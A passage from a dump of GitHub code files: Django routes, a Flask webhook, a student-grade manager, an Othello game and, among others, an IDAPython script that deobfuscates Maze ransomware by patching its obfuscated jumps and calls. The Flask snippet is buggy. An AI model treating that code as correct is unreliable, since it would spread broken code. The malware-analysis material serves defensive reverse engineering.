path('login/', views.login_req, name='login'),\n path('logout/', views.logout_req, name='logout'),\n path('teams/', views.teams, name='teams'),\n path('matches/', views.matches, name='matches'),\n path('tournies/', views.tournies, name='tournies'),\n path('players/', views.players, name='players'),\n path('edit_matches/', views.edit_matches, name='edit_matches'),\n path('edit_teams/', views.edit_teams, name='edit_teams'),\n path('edit_tournies/', views.edit_tournies, name='edit_tournies'),\n path('edit_players/', views.edit_players, name='edit_players'),\n path('edit_news_all/', views.edit_news_all, name='edit_news_all'),\n path('edit_match/', views.edit_match, name='edit_match'),\n path('edit_team/', views.edit_team, name='edit_team'),\n path('edit_tourney/', views.edit_tourney, name='edit_tourney'),\n path('edit_player/', views.edit_player, name='edit_player'),\n path('edit_news/', views.edit_news, name='edit_news'),\n path('delete_match/', views.delete_match, name='delete_match'),\n path('delete_team/', views.delete_team, name='delete_team'),\n path('delete_tourney/', views.delete_tourney, name='delete_tourney'),\n path('delete_player/', views.delete_player, name='delete_player'),\n path('delete_news/', views.delete_news, name='delete_news'),\n path('feedback/', views.feedback, name='feedback'),\n path('show_feedbacks/', views.show_feedbacks, name='show_feedbacks'),\n]","repo_name":"doas-ice/Qpedia-Django","sub_path":"qpedia_project/pedia_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"51"} +{"seq_id":"31537063615","text":"from Alumno import claseAlumno\r\nimport csv\r\nclass claseManejador:\r\n __lista = [] #lista de alumnos de la materia\r\n __listaAprob = [] #lista de alumnos aprobados\r\n __listaDesaprob = [] #lista de alumnos desaprobados\r\n __archivo = None #archivo csv\r\n def __init__(self, lista = [], archivo = open('Lista de Alumnos.csv'), listaA = [], listaD = []):\r\n self.__lista = lista\r\n self.__listaAprob = listaA\r\n self.__listaDesaprob = listaD\r\n self.__archivo = archivo\r\n def crearListaArchivo(self): #crea la lista de alumnos de la materia\r\n reader = csv.reader(self.__archivo, delimiter = ';')\r\n band = True\r\n for fila in reader:\r\n if(band == True):\r\n band = False\r\n else:\r\n unAlumno = claseAlumno(str(fila[0]), str(fila[1]), str(fila[2]), float(fila[3]))\r\n self.__lista.append(unAlumno)\r\n def crearListaAprob(self): #crea la lista de alumnos aprobados ordenados por apellido\r\n for i in range(len(self.__lista)):\r\n if(float(self.__lista[i].getNota() >= 7)):\r\n self.__listaAprob.append(self.__lista[i]) #agrega el alumno aprobado a la nueva lista\r\n def crearListaDesaprob(self): #crea la lista de alumnos desaprobados\r\n for i in range(len(self.__lista)):\r\n if(float(self.__lista[i].getNota() < 7)):\r\n self.__listaDesaprob.append(self.__lista[i]) #agrega el alumno desaprobado a la nueva lista\r\n def ordenar(self):\r\n for i in range(len(self.__lista) - 2): #se ordena la lista general\r\n min = i\r\n for j in range(i + 1, len(self.__lista) - 1):\r\n if(str(self.__lista[j].getApe()) < str(self.__lista[min].getApe())):\r\n min = j\r\n aux = self.__lista[i]\r\n self.__lista[i] = self.__lista[min]\r\n self.__lista[min] = aux\r\n for i in range(len(self.__listaAprob) - 2): #se ordena la lista de DESAPROBADOS por apellido\r\n min = i\r\n for j in range(i + 1, len(self.__listaAprob) - 1):\r\n if (str(self.__listaAprob[j].getApe()) 
< str(self.__listaAprob[min].getApe())):\r\n min = j\r\n aux = self.__listaAprob[i]\r\n self.__listaAprob[i] = self.__listaAprob[min]\r\n self.__listaAprob[min] = aux\r\n for i in range(len(self.__listaDesaprob) - 2): # se ordena la lista de DESAPROBADOS por apellido\r\n min = i\r\n for j in range(i + 1, len(self.__listaDesaprob) - 1):\r\n if (str(self.__listaDesaprob[j].getApe()) < str(self.__listaDesaprob[min].getApe())):\r\n min = j\r\n aux = self.__listaDesaprob[i]\r\n self.__listaDesaprob[i] = self.__listaDesaprob[min]\r\n self.__listaDesaprob[min] = aux\r\n def printLista(self): #muestra la lista completa\r\n for i in range(len(self.__lista)):\r\n self.__lista[i].mostrar()\r\n def printAprob(self): #muestra la lista de alumnos aprobados\r\n for i in range(len(self.__listaAprob)):\r\n self.__listaAprob[i].mostrar()\r\n def printDesaprob(self): #muestra la lista de alumnos desaprbados\r\n for i in range(len(self.__listaDesaprob)):\r\n self.__listaDesaprob[i].mostrar()\r\n def añadirAlumno(self, nom, ape, reg, nota):\r\n unAlumno = claseAlumno(nom, ape, reg, nota)\r\n self.__lista.append(unAlumno)\r\n def removeAlumno(self, alum):\r\n band = [0,0,0]\r\n pos = [0,0,0]\r\n i = 0\r\n while(i < len(self.__lista) and band[0] == 0): #busca el alumno en la lista general\r\n alumInLista = self.__lista[i].getApe() + '-' + self.__lista[i].getNom()\r\n if(alum == alumInLista):\r\n band[0] = 1\r\n pos[0] = i\r\n i+=1\r\n i = 0\r\n while(i < len(self.__listaAprob) and band[1] == 0): #busca el alumno en la lista de aprobados\r\n alumInLista = self.__listaAprob[i].getApe() + '-' + self.__listaAprob[i].getNom()\r\n if(alum == alumInLista):\r\n band[1] = 1\r\n pos[1] = i\r\n i+=1\r\n i = 0\r\n while(i < len(self.__listaDesaprob) and band[2] == 0): #busca el alumno en la lista de desaprobados\r\n alumInLista = self.__listaDesaprob[i].getApe() + '-' + self.__listaDesaprob[i].getNom()\r\n if(alum == alumInLista):\r\n band[2] = 1\r\n pos[2] = i\r\n i+=1\r\n\r\n if (band == [1,1,0] or band == [1,0,1]): #se elimina el alumno en las dos listas posibles\r\n print('DATO: alumno encontrado')\r\n if(band == [1,1,0]):\r\n self.__lista.pop(pos[0])\r\n self.__listaAprob.pop(pos[1])\r\n elif(band == [1,0,1]):\r\n self.__lista.pop(pos[0])\r\n self.__listaDesaprob.pop(pos[2])\r\n else:\r\n print('ERROR: alumno no encontrado')\r\n def reverse(self, op): #invierte las listas\r\n if(op == 1):\r\n self.__lista.reverse()\r\n elif(op == 2):\r\n self.__listaAprob.reverse()\r\n elif(op == 3):\r\n self.__listaDesaprob.reverse()\r\n else:\r\n print('ERROR: opción no válida')","repo_name":"Al3x-BB/Tarea-de--nvestigaci-n","sub_path":"Manejador.py","file_name":"Manejador.py","file_ext":"py","file_size_in_byte":5298,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"2418163322","text":"# @File : CDN_select.py\n# @Author: Sun Peishuai\n# @Date : 2020/12/16\nimport sys\nsys.path.insert(0,\"..\")\n\nfrom database.database import session, A, CNAME\nfrom utils.utils import logger_database as logger\nfrom utils.config import ip2name\ndef select_CDN(session):\n cdn_list=[]\n all_dns=set(session.query(CNAME.dns2).all())\n for cname in all_dns:\n try:\n ip_area=session.query(A.ip, A.area).filter_by(dns=cname[0]).all()\n\n ip_area=set(item[0][::-1].split(\".\",1)[1]+item[1] for item in ip_area)\n if len(ip_area)>=2:\n cdn_list.append(cname[0])\n except:\n print(ip_area)\n\n return cdn_list,len(cdn_list)\n\ncdn_list,length=select_CDN(session)\nprint(length)\nwith 
open(\"cdn_list.txt\",\"w\",encoding=\"utf-8\") as w:\n for cdn in cdn_list:\n w.write(cdn)\n w.write(\"\\n\")\n\n\n\n\n\n\n\n","repo_name":"sunhanwu/cdn_detector","sub_path":"database/CDN_select.py","file_name":"CDN_select.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"6419368893","text":"# app.py\r\nimport json\r\nimport os\r\n#import request\r\n\r\nfrom flask import Flask\r\nfrom flask import request\r\nfrom flask import make_response\r\n\r\n\r\napp = Flask(__name__) # create an app instance\r\n\r\n#@app.route(\"/\") # at the end point /\r\n#def hello(): # call method hello\r\n# return \"Hello World ZT!\" # which returns \"hello world\"\r\n#@app.route('/projects/')\r\n#def projects():\r\n# return 'The project page'\r\n\r\n#@app.route('/about')\r\n#def about():\r\n# return 'The about page'\r\nif __name__ == \"__main__\": # on running python app.py\r\n app.run() # run the flask app\r\n\r\n\r\n\r\n@app.route('/webhook',methods=['POST'])\r\n\r\ndef webhook():\r\n req = request.get_json(silemt=True,force=True)\r\n print(json.dumps(req,indent=4))\r\n res = makeResponse(req)\r\n res = json.dumps(res, indent = 4)\r\n r = make_response(res)\r\n r.headers['Content-Type'] = 'application/json'\r\n return r\r\n\r\ndef makeRespomse(req):\r\n result = req.get(\"queryResult\")\r\n parameters = result.get(\"parameters\")\r\n city = parameters.get(\"geo_city\")\r\n# r = requests.get('https://api.openweathermap.org/data/2.5/weather?q='+city+'&appid=6969565fadecbd630d53a3a3551894c6')\r\n# condition=weather['weather'][0]['description']\r\n r = get_data()\r\n return r \r\n\r\n \r\n\r\n\r\ndef get_data(): \r\n# speech = \"the forecast value for \"+city+\" is \"+condition\r\n return{\r\n \"speech\":\"shailaja Jha\",\r\n \"fulfillmentText\":speech\r\n# \"source\": \"apiai_checkweather_webhook\"\r\n }\r\n \r\n\r\n \r\n#if __name__ =='__main__':\r\n#port = int(os.getenv('port',5000))\r\n#print(\"starting app on port %d\"%port)\r\n#app.run(debug=False, port=port,host='0.0.0.0')\r\n","repo_name":"shailajajha/webhook-for-weatherbot2","sub_path":"webhook.py","file_name":"webhook.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"41591379702","text":"import logging\nfrom datetime import datetime\n\nfrom src.db.connection import DatabaseConnector\nfrom src.entity.historie_pohybu_polozky import HistoriePohybuPolozky\n\n\nclass HistoriePohybuPolozkyController:\n def __init__(self):\n self.historie_pohybu_polozek_model = HistoriePohybuPolozky()\n logging.basicConfig(filename='log/logging.log', level=logging.DEBUG)\n now = datetime.now()\n self.current_time = now.strftime(\"%Y-%m-%d %H:%M:%S\")\n try:\n self.connection, self.cursor = DatabaseConnector().pripojeni()\n except Exception as err:\n print(\"Došlo k chybě při připojení k databázi\", err)\n logging.error(f\"{self.current_time}Nepodařilo se připojit k tabulce historie pohybu polozek: {err}\")\n\n def zobrazit_historii_pohybu_polozek(self):\n self.historie_pohybu_polozek_model.findAll()\n\n def zobrazit_historii_pohybu_polozek_podle_puvodni_lokace(self):\n \"\"\"\n Metoda kontroluje vstup a volá metodu pro zobrazení historie pohybu polozek podle puvodní lokace\n \"\"\"\n try:\n nazev_puvodni_lokace = input(\"Zadejte název původní lokace: \")\n self.historie_pohybu_polozek_model.findByPuvodniLokace(nazev_puvodni_lokace)\n except Exception as e:\n 
print(\"Došlo k neznámé chybě: \", e)\n\n def zobrazit_historii_pohybu_polozek_podle_nove_lokace(self):\n \"\"\"\n Metoda kontroluje vstup a volá metodu pro zobrazení historie pohybu polozek podle nové lokace\n \"\"\"\n try:\n nazev_nove_lokace = input(\"Zadejte název nové lokace: \")\n self.historie_pohybu_polozek_model.findByNoveLokace(nazev_nove_lokace)\n except Exception as e:\n print(\"Došlo k neznámé chybě: \", e)\n\n def zobrazit_historii_pohybu_polozky_od_nejnovejsiho(self):\n \"\"\"\n Metoda kontroluje vstup a volá metodu pro zobrazení historie pohybu vybrané položky od nejnovějších záznamů\n \"\"\"\n try:\n nazev_polozky = input(\"Zadejte název položky: \")\n self.historie_pohybu_polozek_model.findByPolozkaOdNejnovejsiho(nazev_polozky)\n except Exception as e:\n print(\"Došlo k neznámé chybě: \", e)\n\n def zobrazit_historii_pohybu_polozky_od_nejstarsiho(self):\n \"\"\"\n Metoda kontroluje vstup a volá metodu pro zobrazení historie pohybu vybrané položky od nejstarších záznamů\n \"\"\"\n try:\n nazev_polozky = input(\"Zadejte název položky: \")\n self.historie_pohybu_polozek_model.findByPolozkaOdNejstarsiho(nazev_polozky)\n except Exception as e:\n print(\"Došlo k neznámé chybě: \", e)\n\n","repo_name":"DominikSliva/WarehouseApp","sub_path":"src/controllers/historie_pohybu_polozek_controller.py","file_name":"historie_pohybu_polozek_controller.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"cs","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"73074854558","text":"# coding=utf-8\n\"\"\"\nIdaPython script for Maze ransomware deobfuscation.\nTested on IDA 7.5 with Python3\n\"\"\"\n\nimport ida_idaapi\nimport ida_bytes\nimport idc\n\n__author__ = \"Vladyslav Bahlai\"\n__email__ = \"baglai.vlad@gmail.com\"\n\n\ndef fill_with_nops(start, stop):\n for p in range(start, stop):\n ida_bytes.patch_byte(p, 0x90)\n idc.create_insn(p)\n\n idc.create_insn(stop)\n\n\ndef _pattern_len(pattern):\n return len(pattern) // 3 + 1 if len(pattern) % 3 else 0\n\n\ndef resolve_obf_calls(ea):\n next_instr_addr = idc.get_wide_dword(ea + 1)\n\n first_jmp_target = (ea + idc.get_wide_dword(ea + 0x7) + 0xB) & 0xFFFFFFFF\n second_jmp_target = (ea + idc.get_wide_dword(ea + 0xD) + 0x11) & 0xFFFFFFFF\n\n if first_jmp_target != second_jmp_target:\n return\n\n call_param = (first_jmp_target - ea - 5) & 0xFFFFFFFF\n\n # Now we can replace all code till next instruction's address with NOPs\n fill_with_nops(ea, next_instr_addr)\n\n # Insert CALL\n ida_bytes.patch_byte(ea, 0xE8) # CALL\n ida_bytes.patch_dword(ea + 1, call_param)\n idc.create_insn(ea)\n\n return True\n\n\ndef cleanup_resolveapi_calls(ea):\n delta = 0 if idc.get_wide_byte(ea) == 0x6A else 3\n\n intermediate_call_target = idc.get_wide_dword(ea + 8 + delta)\n if intermediate_call_target > 0x40:\n return\n\n # Check if we got library name\n if idc.get_wide_dword(ea + intermediate_call_target + 8 + delta) != 0x006c6c64: # \"dll\\x00\"\n return\n\n # Check if we got enough space for patching\n if idc.get_wide_dword(ea + intermediate_call_target + 0x11 + delta) != 0x90909090 or \\\n idc.get_wide_byte(ea + intermediate_call_target + 0x15 + delta) != 0x90:\n return\n\n idc.patch_byte(ea + 7 + delta, 0xEB)\n idc.patch_byte(ea + 8 + delta, intermediate_call_target + 3)\n fill_with_nops(ea + 9 + delta, ea + 0xC + delta)\n idc.create_insn(ea + 7 + delta)\n\n # Now we need to pass module name parameter through stack\n resolve_api_call_param = idc.get_wide_dword(ea + intermediate_call_target + 0xD + delta)\n 
resolve_api_call_param = resolve_api_call_param - 5 # offset due to inserted PUSH command\n\n # Insert new PUSH command\n idc.patch_byte(ea + intermediate_call_target + 0xC + delta, 0x68)\n idc.patch_dword(ea + intermediate_call_target + 0xD + delta, ea + 0xC + delta)\n idc.create_insn(ea + intermediate_call_target + 0xC + delta)\n\n # Restore call ResolveApi\n idc.patch_byte(ea + intermediate_call_target + 0x11 + delta, 0xE8)\n idc.patch_dword(ea + intermediate_call_target + 0x12 + delta, resolve_api_call_param)\n idc.create_insn(ea + intermediate_call_target + 0x11 + delta)\n \n return True\n\n\ndef resolve_calls_through_register(ea):\n next_instr_addr = idc.get_wide_dword(ea + 1)\n\n # Check if that's just a parameter passing through stack\n if ea & 0xFFFF0000 != next_instr_addr & 0xFFFF0000:\n return\n\n if next_instr_addr - ea > 0x100:\n return\n\n if idc.get_wide_byte(ea + 6) & 0xF0 in [0x20, 0xE0]:\n call_param = 0x9000 + idc.get_wide_byte(ea + 6) ^ 0x30\n else:\n call_param = idc.get_wide_word(ea + 6) ^ 0x30\n\n fill_with_nops(ea, next_instr_addr)\n idc.patch_byte(ea, 0xFF)\n idc.patch_word(ea + 1, call_param)\n idc.create_insn(ea)\n\n return True\n\n\ndef deobfuscate_rets(ea):\n if idc.get_wide_byte(ea) == 0x83:\n fill_with_nops(ea, ea + 7)\n else:\n fill_with_nops(ea, ea + 8)\n\n idc.patch_byte(ea, 0xC3)\n idc.create_insn(ea)\n\n return True\n\n\ndef simplify_jumps(ea):\n # If we got long first conditional jump\n if idc.get_wide_byte(ea) == 0x0F:\n alternative_jmp_cmd = idc.get_wide_byte(ea + 1) ^ 1\n interm_jmp_offt = 6\n else:\n alternative_jmp_cmd = idc.get_wide_byte(ea) ^ 0xF1\n interm_jmp_offt = 2\n\n # Get intermediate jump's value\n if idc.get_wide_byte(ea + interm_jmp_offt) == 0x0F:\n interm_jmp_param = idc.get_wide_dword(ea + interm_jmp_offt + 2)\n final_jmp_addr = ea + interm_jmp_param + interm_jmp_offt + 6\n else:\n interm_jmp_param = idc.get_wide_byte(ea + interm_jmp_offt + 1)\n final_jmp_addr = ea + interm_jmp_param + interm_jmp_offt + 2\n\n # Check the last conditional jump\n\n # 75 ?? ... 0F 85 ?? ?? ?? ??\n if idc.get_wide_byte(final_jmp_addr) == 0x0F and \\\n idc.get_wide_byte(final_jmp_addr + 1) == alternative_jmp_cmd:\n final_jmp_param = idc.get_wide_dword(final_jmp_addr + 2)\n final_jmp_target = (final_jmp_addr + final_jmp_param + 6) & 0xFFFFFFFF\n\n # 75 ?? ... 
75 ??\n elif idc.get_wide_byte(final_jmp_addr) ^ 0xF0 == alternative_jmp_cmd:\n final_jmp_param = idc.get_wide_byte(final_jmp_addr + 1)\n final_jmp_target = (final_jmp_addr + final_jmp_param + 2) & 0xFFFFFFFF\n\n # Make a little cleanup: remove garbage code\n elif interm_jmp_param < 0x10:\n fill_with_nops(ea + interm_jmp_offt, final_jmp_addr)\n return True\n\n else:\n return\n\n if final_jmp_target - ea < 0xFF:\n fill_with_nops(ea + interm_jmp_offt, final_jmp_target)\n else:\n fill_with_nops(ea + interm_jmp_offt, final_jmp_addr + 6)\n\n # Restore seconds jump\n idc.patch_byte(ea + interm_jmp_offt, 0x0F)\n idc.patch_byte(ea + interm_jmp_offt + 1, alternative_jmp_cmd)\n idc.patch_dword(ea + interm_jmp_offt + 2, final_jmp_target - (ea + interm_jmp_offt) - 6)\n idc.create_insn(ea + interm_jmp_offt)\n\n return True\n\n\n# EBCB7F550D19227E554F83A65EA422D9163AB6E437F30AEC4D71FD12F0D26AFB\nPATCH_DATA = [\n (\n [\n # .text:00422F6B 0F 84 AF E5 FD FF jz loc_401520\n # .text:00422F71 75 04 jnz short loc_422F77\n # ...\n # .text:00422F77 75 10 jnz short loc_422F89\n\n # .text:00401CB0 0F 84 AD 63 03 00 jz sub_438063\n # .text:00401CB6 75 04 jnz short loc_401CBC\n # ...\n # .text:00401CBC 0F 85 A1 63 03 00 jnz sub_438063\n \"0F 84 ?? ?? ?? ?? 75 ??\",\n\n # .text:00422F89 0F 85 80 00 00 00 jnz loc_42300F\n # .text:00422F8F 74 04 jz short loc_422F95\n # ...\n # .text:00422F95 74 0A jz short loc_422FA1\n \"0F 85 ?? ?? ?? ?? 74 ??\",\n\n # .text:00401FC4 74 2A jz short loc_401FF0\n # .text:00401FC6 75 04 jnz short loc_401FCC\n # ...\n # .text:00401FCC 75 0A jnz short loc_401FD8\n \"74 ?? 75 ??\",\n\n \"75 ?? 74 ??\",\n\n # .text:00422F6B 0F 84 AF E5 FD FF jz ResolveApi\n # .text:00422F71 0F 85 98 00 00 00 jnz loc_42300F\n # ...\n # .text:0042300F 0F 85 0B E5 FD FF jnz ResolveApi\n \"0F 84 ?? ?? ?? ?? 0F 85 ?? ?? ?? ??\",\n\n \"0F 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ??\"\n ],\n simplify_jumps\n ),\n (\n [\n # .text:00422F66 68 28 31 42 00 push offset loc_423128\n # .text:00422F6B 0F 84 AF E5 FD FF jz loc_401520\n # .text:00422F71 0F 85 A9 E5 FD FF jnz loc_401520\n \"68 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 0F 85 ?? ?? ?? ??\",\n\n \"68 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ??\"\n ],\n resolve_obf_calls\n ),\n (\n [\n # .text:00435E2C 004 68 C6 11 00 00 push 11C6h ; XorModifier\n # .text:00435E31 008 68 7A 14 8F 2F push 2F8F147Ah ; ApiHash\n # .text:00435E36 00C E8 0D 00 00 00 call loc_435E48\n # .text:00435E3B 000 6B 65 72 6E 65 6C 33 32 2E 64+aKernel32Dll_0 db 'kernel32.dll',0\n # .text:00435E48 000 E8 D3 B6 FC FF call ResolveApi\n \"68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??\",\n\n # .text:0043492C 6A 7C push 7Ch ; '|' ; XorModifier\n # .text:0043492E 68 17 04 F7 15 push 15F70417h ; ApiHash\n # .text:00434933 E8 0D 00 00 00 call loc_434945\n # .text:00434938 6B 65 72 6E 65 6C 33 32 2E 64+ aKernel32Dll_28 db 'kernel32.dll',0\n # .text:00434945 E8 D6 CB FC FF call ResolveApi\n \"6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??\"\n ],\n cleanup_resolveapi_calls\n ),\n (\n [\n # .text:00428DD7 68 E3 8D 42 00 push offset unk_428DE3\n # .text:00428DDC FF 60 0C jmp dword ptr [eax+0Ch]\n \"68 ?? ?? ?? ?? FF 60 ??\",\n \"68 ?? ?? ?? ?? FF 61 ??\",\n \"68 ?? ?? ?? ?? FF 62 ??\",\n \"68 ?? ?? ?? ?? FF 63 ??\",\n \"68 ?? ?? ?? ?? FF 64 ??\",\n \"68 ?? ?? ?? ?? FF 65 ??\",\n \"68 ?? ?? ?? ?? FF 66 ??\",\n \"68 ?? ?? ?? ?? FF 67 ??\",\n\n # .text:00435F9B 01C 68 B6 5F 43 00 push offset loc_435FB6\n # .text:00435FA0 020 FF E7 jmp edi\n \"68 ?? ?? ?? ?? FF E0\",\n \"68 ?? ?? ?? ?? FF E1\",\n \"68 ?? ?? ?? ?? FF E2\",\n \"68 ?? ?? ?? ?? 
FF E3\",\n \"68 ?? ?? ?? ?? FF E4\",\n \"68 ?? ?? ?? ?? FF E5\",\n \"68 ?? ?? ?? ?? FF E6\",\n \"68 ?? ?? ?? ?? FF E7\",\n\n # .text:00425A13 68 39 5A 42 00 push offset loc_425A39\n # .text:00425A18 FF 20 jmp dword ptr [eax]\n \"68 ?? ?? ?? ?? FF 20\",\n \"68 ?? ?? ?? ?? FF 21\",\n \"68 ?? ?? ?? ?? FF 22\",\n \"68 ?? ?? ?? ?? FF 23\",\n \"68 ?? ?? ?? ?? FF 24\",\n \"68 ?? ?? ?? ?? FF 25\",\n \"68 ?? ?? ?? ?? FF 26\",\n \"68 ?? ?? ?? ?? FF 27\",\n ],\n resolve_calls_through_register\n ),\n (\n [\n # .text:0041CBB5 83 C4 04 add esp, 4\n # .text:0041CBB8 FF 64 24 FC jmp dword ptr [esp-4]\n \"83 C4 04 FF 64 24 FC\",\n\n # .text:004239E3 44 inc esp\n # .text:004239E4 44 inc esp\n # .text:004239E5 44 inc esp\n # .text:004239E6 44 inc esp\n # .text:004239E7 FF 64 24 FC jmp dword ptr [esp-4]\n \"44 44 44 44 FF 64 24 FC\"\n ],\n deobfuscate_rets\n )\n]\n\n\ndef patch():\n for patterns, patch_function in PATCH_DATA:\n anything_patched = True\n\n while anything_patched:\n anything_patched = False\n\n for pattern in patterns:\n ea = -_pattern_len(pattern)\n\n while True:\n ea += _pattern_len(pattern)\n ea = idc.find_binary(ea, idc.SEARCH_NEXT | idc.SEARCH_DOWN | idc.SEARCH_CASE, pattern)\n if ea == ida_idaapi.BADADDR or idc.get_segm_name(ea) != '.text':\n break\n\n patched = bool(patch_function(ea))\n anything_patched |= patched\n\n if patched:\n print('[0x%08X] Code patched (%s)' % (ea, patch_function.__name__))\n\n print('[PATCHING FINISHED]')\n\n\npatch()\n","repo_name":"bahlaivlad/malware-analysis","sub_path":"maze/maze-deobfuscation-idapython.py","file_name":"maze-deobfuscation-idapython.py","file_ext":"py","file_size_in_byte":12220,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"71604366557","text":"import os\n\ndef bagging_output(results, method='average', path='./submit/bagging.csv', threshold=0.98):\n if method == 'average':\n for qid in results:\n results[qid] = sum(results[qid]) / float(len(results[qid]))\n elif method == 'hard':\n for qid in results:\n if sum(results[qid]) / float(len(results[qid])) > 0.5:\n results[qid] = threshold\n else:\n results[qid] = 1 - threshold\n\n results = sorted(results.items(), key=lambda item: item[0])\n\n file_out = open(path, 'w')\n file_out.write('id,label\\n')\n for i in range(len(results)):\n file_out.write('{},{}\\n'.format(results[i][0], results[i][1]))\n file_out.close()\n\nif __name__ == '__main__':\n path = 'deeps_1'\n\n results = {}\n for dirpath, dirnames, filenames in os.walk(os.path.join('submit', path)):\n for fn in filenames:\n if not fn.endswith('.csv'):\n continue\n file = open(os.path.join('submit', path, fn), 'r')\n line = file.readline()\n while True:\n line = file.readline()\n if line:\n qid, score = line.split(',', 1)\n qid, score = int(qid), float(score)\n if qid not in results:\n results[qid] = []\n\n results[qid].append(score)\n else:\n break\n\n file.close()\n\n\n if not os.path.exists('./submit/bagging'):\n os.makedirs('./submit/bagging')\n\n method = 'hard' # 'average'\n\n bagging_output(results, method=method, path='./submit/bagging/bagging_{}_{}.csv'.format(path, method))","repo_name":"chuzhumin98/DogsVsCatsRedux","sub_path":"bagging_method.py","file_name":"bagging_method.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"71228132000","text":"#\n# @lc app=leetcode.cn id=895 lang=python3\n#\n# [895] 最大频率栈\n#\n\n# @lc code=start\nimport collections\n\n\nclass 
FreqStack:\n\n    def __init__(self):\n        self.cnts = collections.defaultdict(int)\n        self.group = collections.defaultdict(list)\n        self.maxcnt = 0\n\n    def push(self, val: int) -> None:\n        cnt = self.cnts[val] + 1\n        self.cnts[val] = cnt\n        if cnt > self.maxcnt:\n            self.maxcnt = cnt\n        self.group[cnt].append(val)\n\n\n    def pop(self) -> int:\n        x = self.group[self.maxcnt].pop()\n        self.cnts[x] -= 1\n        if not self.group[self.maxcnt]:\n            self.maxcnt -= 1\n        return x\n\n\n# Your FreqStack object will be instantiated and called as such:\n# obj = FreqStack()\n# obj.push(val)\n# param_2 = obj.pop()\n# @lc code=end\n\n","repo_name":"Jvaeyhcd/.leetcode","sub_path":"895.最大频率栈.py","file_name":"895.最大频率栈.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"74111079839","text":"\"\"\"Initial 9\n\nRevision ID: ef3f101feb21\nRevises: de84556d9e2a\nCreate Date: 2021-11-14 06:45:24.012682\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nimport sqlmodel\n\n\n# revision identifiers, used by Alembic.\nrevision = 'ef3f101feb21'\ndown_revision = 'de84556d9e2a'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.add_column('images', sa.Column('url_600', sqlmodel.sql.sqltypes.AutoString(), nullable=True))\n    \n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    \n    op.drop_column('images', 'url_600')\n    # ### end Alembic commands ###\n","repo_name":"madpin/renthub","sub_path":"main/app/alembic/versions/ef3f101feb21_initial_9.py","file_name":"ef3f101feb21_initial_9.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"33874662857","text":"class InvalidOthelloMoveError(Exception):\n    '''Raised whenever an invalid move is made'''\n    pass\n\n\nclass OthelloGameOver(Exception):\n    '''\n    Raised whenever there are no moves left for both players\n    '''\n    pass\n\n\nclass Othello:\n    def __init__(self,num_rows:int,num_columns:int,initial_player:str,top_position:str,default:bool):\n        '''Initializes all attributes of the Othello class'''\n        self.rows = num_rows\n        self.columns = num_columns\n        self.current_player = initial_player\n        self.other_player = initial_player\n        self.current_p_points = 0;\n        self.other_p_points = 0;\n        self.black = \"Black\"\n        self.white = \"White\"\n        self.NONE = ' '\n        self.default = default\n        self.game_over = False\n        self.black_points = 2\n        self.white_points = 2\n        self.board = self.initialize_board(self.rows,self.columns,top_position)\n        self.set_initial_player();\n    \n    def initialize_board(self,rows:int,columns:int,top_position)->[str]:\n        '''Initializes the board with the given rows and columns, placing top_position's colour in the top-left of the four starting centre squares'''\n        self._require_valid_column_number(columns-1)\n        self._require_valid_row_number(rows-1)\n        board = []\n        if(top_position == self.black):\n            other = self.white\n        else:\n            other = self.black\n        for row in range(rows):\n            board.append([])\n            for col in range(columns):\n                board[-1].append(self.NONE)\n            board[int(row/2)][int(columns/2)-1] = top_position\n            board[int(row/2)+1][int(columns/2)-1] = other\n            board[int(row/2)][int(columns/2)] = other\n            board[int(row/2)+1][int(columns/2)] = top_position\n        return board\n
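    \n    # Illustration (added; assumes an 8x8 board): with top_position='White',\n    # the four centre squares end up as\n    #     (3,3)='White'   (3,4)='Black'\n    #     (4,3)='Black'   (4,4)='White'\n    # while every other square holds self.NONE.\n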
    \n    def set_initial_player(self):\n        '''Sets the other player based on the current player'''\n        if self.current_player == self.black:\n            self.other_player = self.white\n        else:\n            self.other_player = self.black\n    \n    def _is_in_board(self,row_num:int, col_num:int):\n        '''Checks whether the given row and column are on the board; returns False if they are not'''\n        return (self._is_valid_row_number(row_num) and self._is_valid_column_number(col_num))\n\n    def get_player(self):\n        '''Returns the current player'''\n        return self.current_player\n    def opposite_player(self):\n        '''Returns the non-current player'''\n        return self.other_player\n\n    def make_move(self,x:int, y:int):\n        '''Given a row and a column, performs the move; raises an exception if the move cannot be made'''\n        if self.game_over == True:\n            raise OthelloGameOver()\n        self._require_valid_row_number(x)\n        self._require_valid_column_number(y)\n        if self._is_in_board(x,y) == False:\n            raise InvalidOthelloMoveError()\n        move_set = self._is_valid_move(x,y)\n        if(move_set != []):\n            self._flip_tiles(x,y,move_set)\n        else:\n            raise InvalidOthelloMoveError()\n        self._update_points()\n        self._compute_player()\n\n    def _flip_tiles(self,x:int,y:int,move_set:[list])->None:\n        '''Flips the 